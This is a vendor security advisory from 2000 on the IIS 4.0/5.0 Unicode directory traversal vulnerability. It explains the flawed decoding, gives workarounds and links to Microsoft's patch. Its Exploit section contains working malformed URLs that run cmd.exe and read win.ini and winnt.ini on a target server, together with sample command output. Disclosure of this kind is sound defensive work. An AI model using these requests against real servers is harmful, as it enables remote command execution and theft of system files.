Logo of NSFOCUS
English Version Chinese Version
Products & Solutions Services Support Reaserch Careers About Us
Research Institute
Security Advisory
Security Advisory
 
NSFOCUS Security Advisory(SA2000-06)

Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability

Release Date: Oct 20, 2000


Affected system:
============

Microsoft IIS 4.0
Microsoft IIS 5.0
¡¡¡¡- Microsoft Windows NT 4.0
¡¡¡¡- Microsoft Windows 2000

Impact:
======

NSFOCUS security team has found a security flaw in Microsoft IIS 4.0/5.0
UNICODE decoding implementation. Exploitation of this vulnerability, It
is possible that a malicious user can run arbitrary command or get the
content of system file in the web server running vulnerable IIS remotely.

Description:
=========

When IIS 5.0 (Chinese version) found "%c1%hh" and "%c0%hh" (0x00<= 0xhh
< 0x40) in the file name, it will decode "%c1%hh" to (0xc1 -0xc0) *
0x40 + 0xhh, and decode "%c0%hh" to (0xc0 -0xc0) * 0x40 + 0xhh.

For example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese version):

http://target/A.ida/%c1%00.ida
IIS said "@.ida" can't be found
here: £¨0xc1-0xc0)*0x40+0x00=0x40='@'

http://target/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: £¨0xc1-0xc0)*0x40+0x01=0x41='A'

http://target/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
.....

http://target/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
....

It means you can encode most characters with this feature.

For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

So attacker can bypass the IIS check for "..\" with this trick.
It is possible to run arbitrary command and read the system file.

Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug
in IIS for other language versions. All it needs is to change
"%c1%1c" into "%c1%9c", or change "%c0%2f" into "%c0%af".


Exploit:
=====

(1) run arbitrary command :

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

IIS will return like this :

Directory of d:\inetpub\scripts

2000-09-28 15:49 <DIR> .
2000-09-28 15:49 <DIR> ..
1999-07-21 17:49¡¡¡¡¡¡¡¡¡¡147,456 ¡¡ Count.exe
2000-09-12 17:08 ¡¡¡¡¡¡¡¡ 1438,290 ¡¡Count25.exe
2000-10-13 15:03 ¡¡¡¡¡¡¡¡ 18,867 ¡¡¡¡ counter.err
2000-08-23 23:07 ¡¡¡¡¡¡¡¡ 1160,002 ¡¡counter.exe
1999-05-25 18:14 ¡¡¡¡¡¡¡¡ 13,925 ¡¡ ¡CCountNT.html
1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512 ¡ ¡ extdgts.exe
2000-08-10 15:24 ¡¡¡¡¡¡¡¡ 146,352 ¡¡¡¡ism.dll
1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512¡ ¡mkstrip.exe
1999-05-25 18:18 ¡¡¡¡¡¡¡¡ 11,317 ¡¡ ¡README.txt
2000-09-28 15:49 <DIR> ¡¡¡¡¡¡¡¡¡¡¡¡¡¡wcount
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡9 File(s) ¡¡935,233 bytes

(2) we can get the content of some system files with this bug too:

http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it to be a request for a .ASP file.It will call asp.dll to open
the file win.ini.

For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is getting
smarter. But we found it is interesting that we can use this malformed URL
to trick IIS to get the winnt.ini:

http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file.
"a.exe" is random .EXE file name. It can be a nonexisting file.


Workaround:
=========

1¡¢If executable CGI is not integrant, delete the executable virtual directory
¡¡¡¡like /scripts etc.
2¡¢If executable virtual directory is needed, we suggest you to assign a
¡¡¡¡separate local driver for it.


Solution:
=======

Microsoft has released one security bulletin concerning this flaw.

The bulletin is live at :

http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

Patches are available at:

. Microsoft IIS 4.0:

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

. Microsoft IIS 5.0:

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
 
 

DISCLAIMS:
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF USINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA